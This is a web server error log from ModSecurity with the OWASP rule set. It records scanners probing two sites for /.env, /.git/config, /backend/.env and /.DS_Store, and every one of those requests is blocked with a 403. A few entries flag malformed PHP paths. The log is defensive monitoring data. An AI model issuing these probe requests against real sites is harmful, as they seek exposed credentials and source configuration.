[Sat Nov 08 19:56:01.999834 2025] [:error] [pid 4102568] [client 138.68.86.32:54398] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ-SQRn0F2RI2-cTfSgf_AAAAAo"]
[Sat Nov 08 19:56:02.000092 2025] [:error] [pid 4102568] [client 138.68.86.32:54398] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ-SQRn0F2RI2-cTfSgf_AAAAAo"]
[Sat Nov 08 19:56:02.000274 2025] [:error] [pid 4102568] [client 138.68.86.32:54398] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQ-SQRn0F2RI2-cTfSgf_AAAAAo"]
[Sat Nov 08 19:56:02.403436 2025] [:error] [pid 4095017] [client 138.68.86.32:54408] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ-SQpJJLKyS8kHxF5TVnwAAAAQ"]
[Sat Nov 08 19:56:02.403654 2025] [:error] [pid 4095017] [client 138.68.86.32:54408] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ-SQpJJLKyS8kHxF5TVnwAAAAQ"]
[Sat Nov 08 19:56:02.403829 2025] [:error] [pid 4095017] [client 138.68.86.32:54408] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQ-SQpJJLKyS8kHxF5TVnwAAAAQ"]
[Sat Nov 08 19:56:02.608199 2025] [:error] [pid 4113432] [client 138.68.86.32:54412] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ-SQhz_calEtu0UwvpW7gAAAAY"]
[Sat Nov 08 19:56:02.608509 2025] [:error] [pid 4113432] [client 138.68.86.32:54412] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ-SQhz_calEtu0UwvpW7gAAAAY"]
[Sat Nov 08 19:56:02.608726 2025] [:error] [pid 4113432] [client 138.68.86.32:54412] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQ-SQhz_calEtu0UwvpW7gAAAAY"]
[Sun Nov 09 02:40:51.132043 2025] [:error] [pid 4118912] [client 3.85.61.56:38768] [client 3.85.61.56] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ_xI8iRPX5WEkv3hyKqwQAAAAY"]
[Sun Nov 09 02:40:51.132354 2025] [:error] [pid 4118912] [client 3.85.61.56:38768] [client 3.85.61.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ_xI8iRPX5WEkv3hyKqwQAAAAY"]
[Sun Nov 09 02:40:51.132556 2025] [:error] [pid 4118912] [client 3.85.61.56:38768] [client 3.85.61.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ_xI8iRPX5WEkv3hyKqwQAAAAY"]
[Sun Nov 09 07:50:26.057857 2025] [:error] [pid 4123481] [client 176.65.148.212:45362] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRA5svK4kaus9NNT0FLwJwAAAAw"]
[Sun Nov 09 07:50:26.058109 2025] [:error] [pid 4123481] [client 176.65.148.212:45362] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRA5svK4kaus9NNT0FLwJwAAAAw"]
[Sun Nov 09 07:50:26.058265 2025] [:error] [pid 4123481] [client 176.65.148.212:45362] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRA5svK4kaus9NNT0FLwJwAAAAw"]
[Sun Nov 09 12:08:11.649393 2025] [:error] [pid 4121476] [client 195.178.110.223:52298] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRB2Gxcnz15I8RMVIyayMwAAAAU"]
[Sun Nov 09 12:08:11.649781 2025] [:error] [pid 4121476] [client 195.178.110.223:52298] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRB2Gxcnz15I8RMVIyayMwAAAAU"]
[Sun Nov 09 12:08:11.649982 2025] [:error] [pid 4121476] [client 195.178.110.223:52298] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRB2Gxcnz15I8RMVIyayMwAAAAU"]
[Sun Nov 09 13:55:53.818496 2025] [authz_core:error] [pid 4123481] [client 4.241.170.137:20244] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/nikic/php-parser/parser.php
[Sun Nov 09 17:45:57.721197 2025] [:error] [pid 4133088] [client 130.33.59.10:54818] [client 130.33.59.10] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "343"] [id "920220"] [msg "URL Encoding Abuse Attack Attempt"] [data "/2%.php"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/2%.php"] [unique_id "aRDFRTsyry3LGnU4Vxq5BAAAAAM"]
[Sun Nov 09 17:45:57.721736 2025] [core:error] [pid 4133088] [client 130.33.59.10:54818] AH10244: invalid URI path (/pub/2%.php)
[Sun Nov 09 17:45:59.306038 2025] [:error] [pid 4132460] [client 130.33.59.10:36315] [client 130.33.59.10] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "343"] [id "920220"] [msg "URL Encoding Abuse Attack Attempt"] [data "/1%.php"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/1%.php"] [unique_id "aRDFR6qxFlmkfrcvEBvejwAAAAQ"]
[Sun Nov 09 17:45:59.306566 2025] [core:error] [pid 4132460] [client 130.33.59.10:36315] AH10244: invalid URI path (/pub/1%.php)
[Sun Nov 09 17:46:06.063721 2025] [:error] [pid 4121476] [client 130.33.59.10:54845] [client 130.33.59.10] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "343"] [id "920220"] [msg "URL Encoding Abuse Attack Attempt"] [data "/0%.php"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/0%.php"] [unique_id "aRDFThcnz15I8RMVIyay8wAAAAU"]
[Sun Nov 09 17:46:06.064224 2025] [core:error] [pid 4121476] [client 130.33.59.10:54845] AH10244: invalid URI path (/pub/0%.php)
[Sun Nov 09 20:10:57.876165 2025] [:error] [pid 4132407] [client 204.76.203.25:59202] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRDnQX71OqggW74IQbsUPQAAAAc"]
[Sun Nov 09 20:10:57.876436 2025] [:error] [pid 4132407] [client 204.76.203.25:59202] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRDnQX71OqggW74IQbsUPQAAAAc"]
[Sun Nov 09 20:10:57.876606 2025] [:error] [pid 4132407] [client 204.76.203.25:59202] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRDnQX71OqggW74IQbsUPQAAAAc"]
[Mon Nov 10 00:36:55.763726 2025] [:error] [pid 4143704] [client 46.193.67.68:47154] [client 46.193.67.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aREll-TBCEgxCRcMrObTigAAAAA"]
[Mon Nov 10 00:36:55.764030 2025] [:error] [pid 4143704] [client 46.193.67.68:47154] [client 46.193.67.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aREll-TBCEgxCRcMrObTigAAAAA"]
[Mon Nov 10 00:36:55.764201 2025] [:error] [pid 4143704] [client 46.193.67.68:47154] [client 46.193.67.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aREll-TBCEgxCRcMrObTigAAAAA"]
[Mon Nov 10 03:55:00.252680 2025] [:error] [pid 4146480] [client 3.81.5.69:40408] [client 3.81.5.69] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRFUBMHX-pzvlplCoAYCZQAAAAE"]
[Mon Nov 10 03:55:00.253015 2025] [:error] [pid 4146480] [client 3.81.5.69:40408] [client 3.81.5.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRFUBMHX-pzvlplCoAYCZQAAAAE"]
[Mon Nov 10 03:55:00.253171 2025] [:error] [pid 4146480] [client 3.81.5.69:40408] [client 3.81.5.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRFUBMHX-pzvlplCoAYCZQAAAAE"]
[Mon Nov 10 05:50:05.895577 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRFu_efliQcntp9nrypyzAAAAAU"]
[Mon Nov 10 05:50:05.896005 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRFu_efliQcntp9nrypyzAAAAAU"]
[Mon Nov 10 05:50:05.896178 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRFu_efliQcntp9nrypyzAAAAAU"]
[Mon Nov 10 05:50:06.465565 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRFu_ufliQcntp9nrypyzQAAAAU"]
[Mon Nov 10 05:50:06.465985 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRFu_ufliQcntp9nrypyzQAAAAU"]
[Mon Nov 10 05:50:06.466177 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRFu_ufliQcntp9nrypyzQAAAAU"]
[Mon Nov 10 05:50:07.192496 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRFu_-fliQcntp9nrypyzgAAAAU"]
[Mon Nov 10 05:50:07.194455 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRFu_-fliQcntp9nrypyzgAAAAU"]
[Mon Nov 10 05:50:07.194796 2025] [:error] [pid 4146495] [client 195.178.110.201:44586] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRFu_-fliQcntp9nrypyzgAAAAU"]
